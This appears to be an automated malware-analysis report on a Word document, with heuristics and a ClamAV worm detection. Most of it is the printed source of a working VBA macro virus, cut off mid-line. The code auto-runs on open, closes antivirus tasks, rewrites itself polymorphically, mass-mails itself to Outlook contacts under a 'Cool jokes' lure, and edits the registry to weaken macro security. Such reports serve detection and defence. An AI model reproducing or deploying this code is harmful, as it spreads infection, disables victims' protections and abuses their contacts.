Verdict: MALICIOUS
Risk Score: 380

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
- T1204.002 Malicious File
The sample contains a VBA macro with an auto-executing Document_Open subroutine. This macro uses CreateObject and Shell() calls, indicative of executing external code. It also attempts to disable antivirus processes by closing tasks with 'av' or 'AV' in their names. The macro's obfuscated nature and the presence of ClamAV detections for 'Win.Worm.Moffas-1' strongly suggest it's designed to download and execute a second-stage payload.
Heuristics (7)

- ClamAV: Win.Worm.Moffas-1 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Win.Worm.Moffas-1
- VBA macros detected (medium, 5 related findings, OLE_VBA_MACROS): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- Obfuscated auto-exec VBA loader (critical, OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER): Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6611 bytes |

SHA-256: f6ebe67192d4a30c8f926326e5a85eb54b4c5ee67355a4dd1cc8636c50be9898

Detection:
- ClamAV: Win.Worm.Moffas-1
- Obfuscation or payload: unlikely

Preview script: first 1,000 lines of the extracted script
```vb
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Declare Function ShowCursor Lib "user32" (ByVal bShow As Long) As Long
Sub Document_Open()
On Error Resume Next
'[die3.B] Virus by MI_pirat
'payload
nr = Day(Date)
If nr = 23 Then
MsgBox Chr(34) + Chr(100) + Chr(105) + Chr(101) + Chr(32) + Chr(100) + Chr(105) + Chr(101) + Chr(32) + _
Chr(100) + Chr(105) + Chr(101) + Chr(34) + Chr(32) + Chr(45) + Chr(91) + Chr(100) + Chr(105) + Chr(101) + _
Chr(51) + Chr(93) + Chr(45) + Chr(32) + Chr(98) + Chr(121) + Chr(32) + Chr(77) + Chr(73) + Chr(95) + Chr(112) + _
Chr(105) + Chr(114) + Chr(97) + Chr(116), vbInformation, Chr(100) + Chr(105) + Chr(101) + Chr(51) + Chr(32) + _
Chr(86) + Chr(105) + Chr(114) + Chr(117) + Chr(115)
System.PrivateProfileString("", "HKEY_CURRENT_USER\Control Panel\Desktop", "Wallpaper") = "C:\Windows\setup.bmp"
ShowCursor 0
End If
'close the antivirus if it is running
Set char1 = Tasks
For ik = 1 To char1.Count
If InStr(1, char1(ik).Name, "av", vbTextCompare) Or InStr(1, char1(ik).Name, "AV", vbTextCompare) Then
char1(ik).Close
End If
Next ik
'poly starts here:
Set char1 = ActiveDocument.VBProject
Set char2 = char1.VBComponents(1).CodeModule
If ThisDocument.FullName <> Templates(1).FullName Then
nr = 17
ReDim suk(1 To nr) As String
suk(1) = "nr": suk(2) = "bkup": suk(3) = "suk": suk(4) = "myRange"
suk(5) = "strip": suk(6) = "ik": suk(7) = "char1": suk(8) = "nam1"
suk(9) = "DOutlook": suk(10) = "DMapiName": suk(11) = "BreakUmOffAS"
suk(12) = "mmm": suk(13) = "xxx": suk(14) = "aa": suk(15) = "Pee": suk(16) = "ij": suk(17) = "char2"
'rename variables
For ik = 1 To nr
Randomize
strip = Chr(Int((25 * Rnd) + 65)) + Chr(Int((25 * Rnd) + 65)) + Chr(Int((25 * Rnd) + 65)) + "Mp"
For bkup = 2 To char2.CountOfLines
nam1 = char2.Lines(bkup, 1)
If InStr(1, nam1, suk(ik), vbTextCompare) Then
nam1 = Replace(nam1, suk(ik), strip, 1, -1, vbTextCompare)
char2.ReplaceLine bkup, nam1
End If
Next bkup
Next ik
'Also append some random characters (to be even more polymorphic), but not too many
For ik = 2 To char2.CountOfLines
nam1 = char2.Lines(ik, 1)
If Len(nam1) <= 100 Then
nam1 = nam1 + "'" + Chr(Int((120 * Rnd) + 32)) + Chr(Int((120 * Rnd) + 32)) + Chr(Int((120 * Rnd) + 32))
char2.ReplaceLine ik, nam1
End If
Next ik
End If
'The virus itself
'-------------------------------------------------------------------
'e-mail spread
Dim DOutlook, DMapiName, BreakUmOffAS
mmm = Chr(79) + Chr(117) + Chr(116) + Chr(108) + Chr(111) + Chr(111) + Chr(107)
Set DOutlook = CreateObject(mmm + ".Application")
Set DMapiName = DOutlook.GetNameSpace("MAPI")
If DOutlook = mmm Then
DMapiName.Logon "profile", "password"
Set mmm = DMapiName.AddressLists
For ik = 1 To mmm.Count
Set ABook = DMapiName.AddressLists(ik)
xxx = 1
Set aa = ABook.AddressEntries
Set BreakUmOffAS = DOutlook.CreateItem(0)
For ij = 1 To aa.Count
Pee = aa(xxx)
BreakUmOffAS.Recipients.Add Pee
xxx = xxx + 1
If xxx > 20 Then nr = aa.Count
Next ij
BreakUmOffAS.Subject = "hello!!!"
BreakUmOffAS.Body = "Cool jokes (more in the doc.) "
BreakUmOffAS.Attachments.Add ActiveDocument.FullName
BreakUmOffAS.Send
Pee = ""
Next ik
DMapiName.Logoff
End If
'check whether the computer has already been infected
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "XP") <> "inXP" Then
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "XP") = "inXP"
'security, what security?! :D
Options.SaveNormalPrompt = 5 Xor 5
CommandBars(Chr(84) + Chr(111) + Chr(111) + Chr(108) + Chr(115)).Controls(Chr(77) + Chr(97) + Chr(99) + Chr(114) + Chr(111)).Enabled = (1 Xor 1)
Open "C:\a.reg" For Output As #1
Print #1, "REGEDIT4"
Print #1, ""
Print #1, "[HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security]"
Print #1, """Level"" = dword:00000001"
Print #1, """AccessVBO
```
... (truncated)